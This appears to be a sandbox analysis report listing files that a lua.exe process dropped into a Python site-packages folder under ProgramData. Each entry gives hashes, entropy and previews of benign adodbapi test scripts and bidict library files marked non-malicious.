SSDEEP:	96:9fBaXE0zQzby03FO3ZAYX0qnjQHAudOFrhQMbCgl6w+THrNwT/eZSyYk:XaXJzQzby0VO3CJqnj4cUMbCRweLNwjY
MD5:	C6E225B3FD63FA1009ED57D509F090F0
SHA1:	ABAF5F9743B2A2067A98078A82C6817C92936C12
SHA-256:	968F7613E99C9BE9657B71A6A153B1E2D735C469A51BAC171E3C62F8F80A6CF8
SHA-512:	F2799F62327EC96EAA9228DA402E3EFE68BA485EAD5B9274296A3AB58CA307265DB90C90815115EFCE1B0FE3F05F049D017B72CF5F2FCD0ACF4A72BFA0D272FD
Malicious:	false
Preview:	print("This module depends on the dbapi20 compliance tests created by Stuart Bishop")..print("(see db-sig mailing list history for info)")..import platform..import unittest..import sys....import dbapi20..import setuptestframework....testfolder = setuptestframework.maketemp()..if '--package' in sys.argv:.. pth = setuptestframework.makeadopackage(testfolder).. sys.argv.remove('--package')..else:.. pth = setuptestframework.find_ado_path()..if pth not in sys.path:.. sys.path.insert(1,pth)..# function to clean up the temporary folder -- calling program must run this function before exit...cleanup = setuptestframework.getcleanupfunction()....import adodbapi..import adodbapi.is64bit as is64bit..db = adodbapi....if '--verbose' in sys.argv:.. db.adodbapi.verbose = 3....print(adodbapi.version)..print("Tested with dbapi20 %s" % dbapi20.__version__)....try:.. onWindows = bool(sys.getwindowsversion()) # seems to work on all versions of Python..except:.. onWindows = False....nod

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\test\tryconnection.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1079
Entropy (8bit):	4.45994398759956
Encrypted:	false
SSDEEP:	12:3sfx2xgFyl0KPPJzy7y2GSEPsDrNSqUnsQc3fXHFRCOFNDal6oGytGmaAlajtGtl:cfxFy1J27abPscq/bfKqcso7bYrqrTXx
MD5:	AD9FACA724C8385DD13819CF7553A6BB
SHA1:	C0C1F4450C87A08E74FE8F464A6814ABCCECE050
SHA-256:	A920EB724A6454A6FA293C8675D3945ACDB7F2F62C383FAFEF9175071D9958DC
SHA-512:	124B379BB58BA43BEF73A54B71C734D3C93EE502940C7D1A1C2899EF0F5806EFC73F750156A46A595617C60F6107FF911B3D5C6C48F96BD94682E901B8CD3CBF
Malicious:	false
Preview:	remote = False # automatic testing of remote access has been removed here..def try_connection(verbose, args, kwargs):. import adodbapi.. dbconnect = adodbapi.connect. try:. s = dbconnect(args, kwargs) # connect to server. if verbose:. print('Connected to:', s.connection_string). print('which has tables:', s.get_table_names()). s.close() # thanks, it worked, goodbye. except adodbapi.DatabaseError as inst:. print(inst.args[0]) # should be the error message. print('Failed getting connection using=',repr(args),repr(kwargs)). return False, (args, kwargs), None.. print(" (successful)").. return True, (args, kwargs, remote), dbconnect...def try_operation_with_expected_exception(expected_exception_list, some_function, args, *kwargs):. try:. some_function(args, **kwargs). except expected_exception_list as e:. return True, e. except:. raise # an exception other than

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict-0.21.2.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict-0.21.2.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16725
Entropy (8bit):	4.537170378389401
Encrypted:	false
SSDEEP:	384:na28R/9woeF6cXpMPWeXlUl5omyzQdBGYVSlVCqx2:nNw/6oj25kzQdBGXCqY
MD5:	9741C346EEF56131163E13B9DB1241B3
SHA1:	D22157ABC0FC0B4AE96380C09528E23CF77290A9
SHA-256:	1F256ECAD192880510E84AD60474EAB7589218784B9A50BC7CEEE34C2B91F1D5
SHA-512:	C1E3A0C8F5267FB5C0B65733BDA037C62D914ED989BEE0F510D8196B1029EEC00D40F415CE1514A4996D420BA02D856D04DB0915B64573EF4A36033CC5EFB94E
Malicious:	false
Preview:	Mozilla Public License Version 2.0.==================================..1. Definitions.--------------..1.1. "Contributor". means each individual or legal entity that creates, contributes to. the creation of, or owns Covered Software...1.2. "Contributor Version". means the combination of the Contributions of others (if any) used. by a Contributor and that particular Contributor's Contribution...1.3. "Contribution". means Covered Software of a particular Contributor...1.4. "Covered Software". means Source Code Form to which the initial Contributor has attached. the notice in Exhibit A, the Executable Form of such Source Code. Form, and Modifications of such Source Code Form, in each case. including portions thereof...1.5. "Incompatible With Secondary Licenses". means.. (a) that the initial Contributor has attached the notice described. in Exhibit B to the Covered Software; or.. (b) that the Covered Software was made available under the terms of.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict-0.21.2.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11630
Entropy (8bit):	5.0905472620973375
Encrypted:	false
SSDEEP:	192:wzsaVf/OKNDRCOxYCqu7eD5QDRhvd22wd7eAknR1eM1XS5zku/NoxMtq6vxrRLw4:ws+WKNNC8Yw7E5QNhV22wd7oNQ5ku/KK
MD5:	7EA948FF61AF49F25168F09F8BBC0E34
SHA1:	3A6325D4DC21DD452A0D34E8D2A4025AAD1797D6
SHA-256:	EA9DF7A049CAEA220404CE28EF040B18F5327981ED73EC845BAFECD393777797
SHA-512:	0BC85FC880219ED25AD3FCD901EC5DA9CF09EF8449CEA38C0B2E1128622B9B630E968E63584C2D82FCDECBBACBBB30E733C4E9D9FD4BF11EFDEF2DDDE10E75AE
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: bidict.Version: 0.21.2.Summary: The bidirectional mapping library for Python..Home-page: https://bidict.readthedocs.io.Author: Joshua Bronson.Author-email: jabronson@gmail.com.License: MPL 2.0.Keywords: dict dictionary mapping datastructure bimap bijection bijective injective inverse reverse bidirectional two-way 2-way.Platform: UNKNOWN.Classifier: Development Status :: 4 - Beta.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0).Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Req

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict-0.21.2.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2621
Entropy (8bit):	5.7285170592443
Encrypted:	false
SSDEEP:	48:p+nuXzu+gu+iu+Iu+mou+lfx3DcPSmxwVE+ztg/7gbJWlItrQ4W3ojP7t8bGWPQ0:bXziQuooN3DcPSmxwVE+ztg/7gbJWlIS
MD5:	97DE09453B3ADD50E1700C522AB714DD
SHA1:	AC0E5639CAD741502D5D9ED22A6461ED1997DE46
SHA-256:	7414181F4B1071F8F027B8D94345D2E9BCBBB3473C85C6A545EFED0A20B88EBD
SHA-512:	AAF23FBE6B88E4C9D324F15A1688CDF742124DAA372193E332F6C45893D5D930A5814AE6BFB6554E5CF1685371C31B0F0EFD83822F5B7685727CB0F144CFBF0D
Malicious:	false
Preview:	bidict-0.21.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..bidict-0.21.2.dist-info/LICENSE,sha256=HyVuytGSiAUQ6ErWBHTqt1iSGHhLmlC8fO7jTCuR8dU,16725..bidict-0.21.2.dist-info/METADATA,sha256=6p33oEnK6iIEBM4o7wQLGPUyeYHtc-yEW6_s05N3d5c,11630..bidict-0.21.2.dist-info/RECORD,,..bidict-0.21.2.dist-info/WHEEL,sha256=ADKeyaGyKF5DwBNE0sRE5pvW-bSkFMJfBuhzZ3rceP4,110..bidict-0.21.2.dist-info/top_level.txt,sha256=WuQO02jp0ODioS7sJoaHg3JJ5_3h6Sxo9RITvNGPYmc,7..bidict/__init__.py,sha256=A2ZUK4jTHNN6T3QUaSh7xuIwc-Ytgw6gVLHNx07D7Fo,3910..bidict/__pycache__/__init__.cpython-37.pyc,,..bidict/__pycache__/_abc.cpython-37.pyc,,..bidict/__pycache__/_base.cpython-37.pyc,,..bidict/__pycache__/_bidict.cpython-37.pyc,,..bidict/__pycache__/_delegating.cpython-37.pyc,,..bidict/__pycache__/_dup.cpython-37.pyc,,..bidict/__pycache__/_exc.cpython-37.pyc,,..bidict/__pycache__/_frozenbidict.cpython-37.pyc,,..bidict/__pycache__/_frozenordered.cpython-37.pyc,,..bidict/__pycache__/_iter.cpytho

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict-0.21.2.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCf7irO5S:RtBMwlViGjWBBwt
MD5:	D25A99ECD1ECB535EE4E31874B0C7B95
SHA1:	B80780FBBF97A5FBF433C4F692E340632EA675F1
SHA-256:	00329EC9A1B2285E43C01344D2C444E69BD6F9B4A414C25F06E873677ADC78FE
SHA-512:	539E072414E6E8AD3BFAEDB0587507443B39826814FB330B57D605FB5FBE61134D3548359F41A14CC63B44E23EF0AA1E62EA1C4A2F3B344BE548F4C2C8143976
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict-0.21.2.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.5216406363433186
Encrypted:	false
SSDEEP:	3:IRvn:IRv
MD5:	0511FCCC1A9B9E06CFC7038CC98D5C15
SHA1:	AFFB7181A5AEDD560EBB9CEB7A0394BBD9341F92
SHA-256:	5AE40ED368E9D0E0E2A12EEC268687837249E7FDE1E92C68F51213BCD18F6267
SHA-512:	C4F50CFCC13FCCB50F8E84C9C2AA19C2ED6BD7AD171C1951D6C404E3299027676EFE05539B0F571B00DCB5D00C79D3692760FC8437B813649ED79C720C6C3EF6
Malicious:	false
Preview:	bidict.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3910
Entropy (8bit):	4.821383969128057
Encrypted:	false
SSDEEP:	48:pnLP82aJ+LoO+2/pKktg3R2kUGwOh+AlDSq7qE1ySIZcYocpqc+M4RJ14hFRlPpx:tbjp5wlDn7qKyzcYoRJ1URpZFTF
MD5:	FDFF86F0B9AF4AE1984D25A54D940060
SHA1:	AB6DB7B40D8C27138F4694FD85576DCE4193A077
SHA-256:	0366542B88D31CD37A4F741469287BC6E23073E62D830EA054B1CDC74EC3EC5A
SHA-512:	7CD004C1DF3BAD2D82682CF2C75B91922D59D71A464DF1A00E2B5BD675873059D908D06B672162690B15833292F5CF29A6786F3F179F1824441B637F571E014C
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_abc.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.665949618267224
Encrypted:	false
SSDEEP:	96:tbj2TofIfUAtk4loyruQJp2j4j0edkBaMy4PSFIgHg2:tbCTPtk41hqYWYnt
MD5:	1F0043F1339E05867C33F1F1A35BD0CA
SHA1:	7CB06C59DD10F917AEB3C56B72DFFDB6697A161F
SHA-256:	8AB116B289450A9F29B3BECE2A65B0074813AE95DCE5B7B4441747690A0FC9B9
SHA-512:	BC1C9507EC20B03D2880230DDD6CD99A6350779B64C332650E2B18234FC6101DAE033EC3E259FC8B37B1F71243C5E7837DD4240F7DF47A5B48F1CCC9A79E1685
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_base.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16180
Entropy (8bit):	4.689209123975267
Encrypted:	false
SSDEEP:	384:bIiKeLqZRehDsFtPZoV8gUz+SCMc/rFv33v0qT2w/z:zKeL4RehDsFnkMcR33v0qT2wb
MD5:	3D50F31B01D7298D43E13F8DF4A8EED3
SHA1:	C60257DBBE866DCDDD829FB39A6C9E3418B95706
SHA-256:	93BA0B1706FFE993073217C8DB5EE19CCF967C9E28C55313A25D411B5E04DDC0
SHA-512:	FD4B4D1A74E360464FDCD548E00247A6FB3AE2B22DBDF924BEA2857D3798AA9C022E2C7467ECB063680326B6286757DDF7CCFB297B795617B4E30790C6B947F4
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_bidict.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2005
Entropy (8bit):	4.476723373157152
Encrypted:	false
SSDEEP:	24:lTR4Wrm8PDwSCAaJ+qb90oOgazkh58T14W2qhhP6oTmgHgWLe23azkh58Ts:pnLP82aJ+LoOeD8B4cP6ZgHgWacD84
MD5:	AFD8ADADAEA96AB600F3CDD22EB06187
SHA1:	160295C0367492E4E18761BD5794F5405E5E98DD
SHA-256:	F391B54F259E3192C4EF41CAFAAC0256E83E6C275A2376C87A8071273C129244
SHA-512:	DBB7DDD820131C7509301992BCC114D8FB185E20B79EB5D8C51CAB44DE1BDFF42FA8FFF4E61D5C323ECA70FF16CB5CFE1492104E74691CEC98ABA3CC88920EBC
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_delegating.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1313
Entropy (8bit):	4.914585963610615
Encrypted:	false
SSDEEP:	24:lTR4Wrm8F4d2qhsME23XAQQ8ekZ+XS0e7yKSbSHR6p:pnLF4vsMt3w2ll0fusp
MD5:	8CB84F2C0A244185603CF4D89C583680
SHA1:	054B046ABD206CC3A374176ECCC25A5D7389F9C7
SHA-256:	5226D97B0C2098DF22044099B6310BC0A979CE172EC589F2CB682C8805C17B77
SHA-512:	FFCC082C0AA67BD1B104FE2EFB422DB0E69D05E0AEF3CE23BE4179B26CF166DC484F1F566F7262F3AD4CBE827D426F783DA16E1577D0BC0EEE73B6CE506ACFC0
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...."""Provide :class:`_DelegatingBidict`."""..import typing as _t..from ._base import BidictBase.from ._typing import KT, VT...class _DelegatingBidict(BidictBase[KT, VT]):. """Provide optimized implementations of several methods by delegating to backing dicts... Used to override less efficient implementations inherited by :class:`~collections.abc.Mapping`.. """.. __slots__ = ().. def __iter__(self) -> _t.Iterator[KT]:. """Iterator over the contained keys.""". return iter(self._fwdm).. def keys(self) -> _t.KeysView[KT]:. """A set-like object providing a view on the contained keys.""". return self._fwdm.keys().. def values(self) -> _t.KeysView[VT]: # type: igno

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_dup.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1819
Entropy (8bit):	5.236575402019063
Encrypted:	false
SSDEEP:	24:lTR4Wrm8F4iNTwq7KeqEDMJPuTYNBKFMUV06VXafKVXvCN6J2oBnCRHuzRYPuFVf:pnLF4EKe/MJlNBaMU90KdZkps9FS45l
MD5:	04392DF9F3676F703135D5AC72CBB359
SHA1:	65429D48AEF2AE664C13002111A04816D6FB29D8
SHA-256:	8F40D2B1E82E21D0A0021AB19B4667DBCF3BD75D33C7BD05D7D2EFC3B8626B28
SHA-512:	639B4AAD9C8935C6754E080361FFD1F57A0348F10417DC3D9B59E51B1D0726E1D7E1AD07352811D0FD8EED9B462B848B4C562B95136E45464BF0CFA19218A4B5
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...."""Provide :class:`OnDup` and related functionality."""...from collections import namedtuple.from enum import Enum...class OnDupAction(Enum):. """An action to take to prevent duplication from occurring.""".. #: Raise a :class:`~bidict.DuplicationError`.. RAISE = 'RAISE'. #: Overwrite existing items with new items.. DROP_OLD = 'DROP_OLD'. #: Keep existing items and drop new items.. DROP_NEW = 'DROP_NEW'.. def __repr__(self) -> str:. return f'<{self.name}>'...RAISE = OnDupAction.RAISE.DROP_OLD = OnDupAction.DROP_OLD.DROP_NEW = OnDupAction.DROP_NEW...class OnDup(namedtuple('_OnDup', 'key val kv')):. r"""A 3-tuple of :class:`OnDupAction`\s specifying how to handle the 3 kinds

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_exc.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1053
Entropy (8bit):	4.8789100928356435
Encrypted:	false
SSDEEP:	24:lTR4Wrm8F+PCXkOOXLZ4ZdMMLq8hFk0dKgv:pnLF+KXkzZ4ZdMsq8XdRv
MD5:	E5D16BF2EEF01D37CB09663E2CD48682
SHA1:	DCA8D8B77ED70052A2FFB94882C88A143961F71F
SHA-256:	9CA386AB1A8EBF28E17A1F8F828F9D65959146F3C4598C83F14926E5747C58D9
SHA-512:	2BF1362AF948E39E16F415F49AE5EE043FC24C8F432E4500D34E3678881CD5D83F3FC1B1631F4EB89CBC0748E7714765C2A44AE3EC7FFED662D678EA5ACFE727
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...."""Provide all bidict exceptions."""...class BidictException(Exception):. """Base class for bidict exceptions."""...class DuplicationError(BidictException):. """Base class for exceptions raised when uniqueness is violated. as per the :attr:~bidict.RAISE` :class:`~bidict.OnDupAction`.. """...class KeyDuplicationError(DuplicationError):. """Raised when a given key is not unique."""...class ValueDuplicationError(DuplicationError):. """Raised when a given value is not unique."""...class KeyAndValueDuplicationError(KeyDuplicationError, ValueDuplicationError):. """Raised when a given item's key and value are not unique... That is, its key duplicates that of another item,. and its valu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_frozenbidict.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2494
Entropy (8bit):	4.599829328877422
Encrypted:	false
SSDEEP:	24:lTR4Wrm8PDwSCAaJ+qb90oOgazWaP0Tt4SHgS2qhwwo2HeHCRrNp/L2W5KclazWS:pnLP82aJ+LoOD054FZwFp/LbJy06
MD5:	D3307C237E72F2B024F58338B37DE92B
SHA1:	ABBDA1AB77AF37E7F3B3F3A3FC46E16D93A25CE8
SHA-256:	218308CEC9BDA405D34BCD7D4F0EF3FD54CB204662AF8A0B25BADC45CE7214FF
SHA-512:	C5735309B4768F783B9767FE9861F756BF2FE74B2D28D4E178227B89905004E5A983399E95A3A68F8E6EA84254AB3F71C632155E2E98369D79721AFC5EB76373
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_frozenordered.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3224
Entropy (8bit):	4.696798724703964
Encrypted:	false
SSDEEP:	24:lTR4Wrm8PDwSCAaJ+qb90oOgazd34lgdom2qLBzgdPbR6o2Ngdd/2RwDej06PYl4:pnLP82aJ+LoOH4nkO4o5/2RTzZSCy0Qy
MD5:	A97E65F765DAE566A3849070C74149E1
SHA1:	7690AAEB681EB8D68CF53745C397708F30420458
SHA-256:	138933048A2B8992EEB61F48D65979ECA7A5BD437FC4302F663407EC635D9F7D
SHA-512:	82C05AEC91E2FC72D8AF7059E5B2255C9E6D941CE644469BB0F756797F8F9839341A19D6865D29589A6F8E8D612DA6B7629C22A1C3EF0EB902946E1CD1A9F351
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_iter.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2333
Entropy (8bit):	4.860115041019169
Encrypted:	false
SSDEEP:	48:pnLC2gujUPb3vgEmXGFyAyB9w27DcRJUj:t227UT/sXGUA44JUj
MD5:	56829E07ECA30D0C0FC5D6C872A0680B
SHA1:	AC9C56A048AB7B6027BB63393AEFF4000FF4CFAF
SHA-256:	17DCE81ECF88AE4B9CBA36D11A7309B251FF19CFD0AE56B8324D6C3AF9FB10B8
SHA-512:	373F99F5F2A01DB981B3644FE27DB86F5C71B07220C63C32AEECE2FE596766FCC1D8A6D0C7CB161D5DE56D7A63040441A6227FE72F586EF7F7EC59887226EE09
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...."""Functions for iterating over items in a mapping."""..import typing as _t.from collections.abc import Mapping.from itertools import chain, repeat..from ._typing import KT, VT, IterItems, MapOrIterItems..._NULL_IT = repeat(None, 0) # repeat 0 times -> raise StopIteration from the start...def _iteritems_mapping_or_iterable(arg: MapOrIterItems[KT, VT]) -> IterItems[KT, VT]:. """Yield the items in arg... If arg is a :class:`~collections.abc.Mapping`, return an iterator over its items.. Otherwise return an iterator over arg itself.. """. return iter(arg.items() if isinstance(arg, Mapping) else arg)...def _iteritems_args_kw(args: MapOrIterItems[KT, VT], *kw: VT) -> IterItems[KT, VT]:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_mut.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7352
Entropy (8bit):	4.809459973040931
Encrypted:	false
SSDEEP:	96:tbj2DgHg73GN00vx2bkE9OzmvTMfAZQr5wKSo:tba0O3WvsbBsziMfAaGKSo
MD5:	DC385D678204B0D65BDCA3C846D9806D
SHA1:	EE85EE1A320B9A03FBB57446008E7318B31B775F
SHA-256:	3015F382599E3499E245B759D42D13C75E2972C681762D4D3DA685188CD91298
SHA-512:	08C6B0F0BC9A242842CE911E323E76350122AD45A56C9853303C9BFCC55EEE3D34D0A6E2A7DF9923B7D6FD2A72764E0D071256A680F8B01B96F3ABC9C0E21704
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_named.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3784
Entropy (8bit):	4.8143169086026925
Encrypted:	false
SSDEEP:	96:tHA7N10koUZmRHvmeUy5+Yxp1bUPt5YWNVZRSzDlydsoD:tHc10fCaPgMxAWsVZRS3AdHD
MD5:	1B77617FEE99287D751B63DCF413C0AE
SHA1:	C5D49568DCC0135CC821F354FCF319ED85BB4F50
SHA-256:	FD6423A33F6913577F1F05505F4E6F9F94ED84E4443B0E3DC837454ACE65BD4E
SHA-512:	0C7D5246C55CA684D8F2A0CF08802129CD10BF230C2E64A500032F62281B8C563E4339C0BC90E5B577B443827FFF7DCC024A6A1EFB3709AC274539D04A801B40
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/..."""Provide :func:`bidict.namedbidict`."""..import typing as _t.from sys import _getframe..from ._abc import BidirectionalMapping, KT, VT.from ._bidict import bidict...def namedbidict(. typename: str,. keyname: str,. valname: str,. ,. base_type: _t.Type[BidirectionalMapping[KT, VT]] = bidict,.) -> _t.Type[BidirectionalMapping[KT, VT]]:. r"""Create a new subclass of base_type* with custom accessors... Like :func:`collections.namedtuple` for bidicts... The new class's ``__name__`` and ``__qualname__`` will be set to typename,. and its ``__module__`` will be set to the caller's module... Instances of the new class will provide access to their. :attr:`inverse <BidirectionalM

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_orderedbase.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12196
Entropy (8bit):	4.585916452553485
Encrypted:	false
